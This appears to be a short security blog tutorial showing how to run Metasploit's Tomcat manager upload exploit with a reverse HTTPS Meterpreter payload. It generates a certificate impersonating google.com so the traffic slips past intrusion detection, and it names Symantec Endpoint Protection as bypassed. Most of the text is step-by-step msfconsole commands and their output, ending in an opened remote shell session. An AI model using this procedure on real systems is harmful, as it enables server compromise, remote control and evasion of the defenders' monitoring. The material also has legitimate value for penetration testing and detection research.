Meterpreter with custom SSL-Certificate
Nov 16, 2020
With this setup you are able to bypass a lot of IDS/Endpoint-Protections that are detecting meterpreter traffic but not the binary itself.
We will show you an example for a tomcat exploit with a reverse meterpreter shell using a custom SSL-Certificate which is able to bypass Symantec Endpoint Protection (Network IPS/IDS Component).
# push your actual module to the stack
msf5 exploit(multi/http/tomcat_mgr_upload) > pushm# use ssl impersonate auxiliary
msf5 exploit(multi/http/tomcat_mgr_upload) > use auxiliary/gather/impersonate_ssl# set an existing page as RHOST (you probably need an internet connection)msf5 auxiliary(gather/impersonate_ssl) > set RHOST www.google.com
msf5 auxiliary(gather/impersonate_ssl) > run
...
[+] 172.217.22.4:443 - pem: /home/{HIDDEN}/.msf4/loot/20190822092326_default_172.217.22.4_172.217.22.4_pem_732180.pem
...
After successful creation of a custom SSL-Certificate you can setup meterpreter
# pop your module from the stackmsf5 auxiliary(gather/impersonate_ssl) > popm
msf5 exploit(multi/http/tomcat_mgr_upload) > set PAYLOAD windows/meterpreter/reverse_https# set the custom SSL-Certificate
msf5 exploit(multi/http/tomcat_mgr_upload) > set HandlerSSLCert /home/{HIDDEN}/.msf4/loot/20190822092326_default_172.217.22.4_172.217.22.4_pem_732180.pem# enable stage encoding
msf5 exploit(multi/http/tomcat_mgr_upload) > set EnableStageEncoding true# ensure the verification on the custom certificate is enabled
msf5 exploit(multi/http/tomcat_mgr_upload) > set StagerVerifySSLCert true
Run the exploit
msf5 exploit(multi/http/tomcat_mgr_upload) > exploit[*] Started HTTPS reverse handler on https://0.0.0.0:8443
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying RrXCapJj...
[*] Executing RrXCapJj...
[*] Undeploying RrXCapJj ...
[*] https://0.0.0.0.:8443 handling request from 10.10.10.10; (UUID: rdmovfni) Meterpreter will verify SSL Certificate with SHA1 hash cfcca6877ba70c4a16f18b8a557ea1d2bc3f3f85
[*] https://0.0.0.0:8443 handling request from 10.10.10.10; (UUID: rdmovfni) Encoded stage with x86/shikata_ga_nai
[*] https://0.0.0.0:8443 handling request from 10.10.10.10; (UUID: rdmovfni) Staging x86 payload (180854 bytes) ...
[*] Meterpreter session 1 opened (0.0.0.0:8443 -> 10.10.10.10:52436) at 2019-08-22 09:25:48 +0200
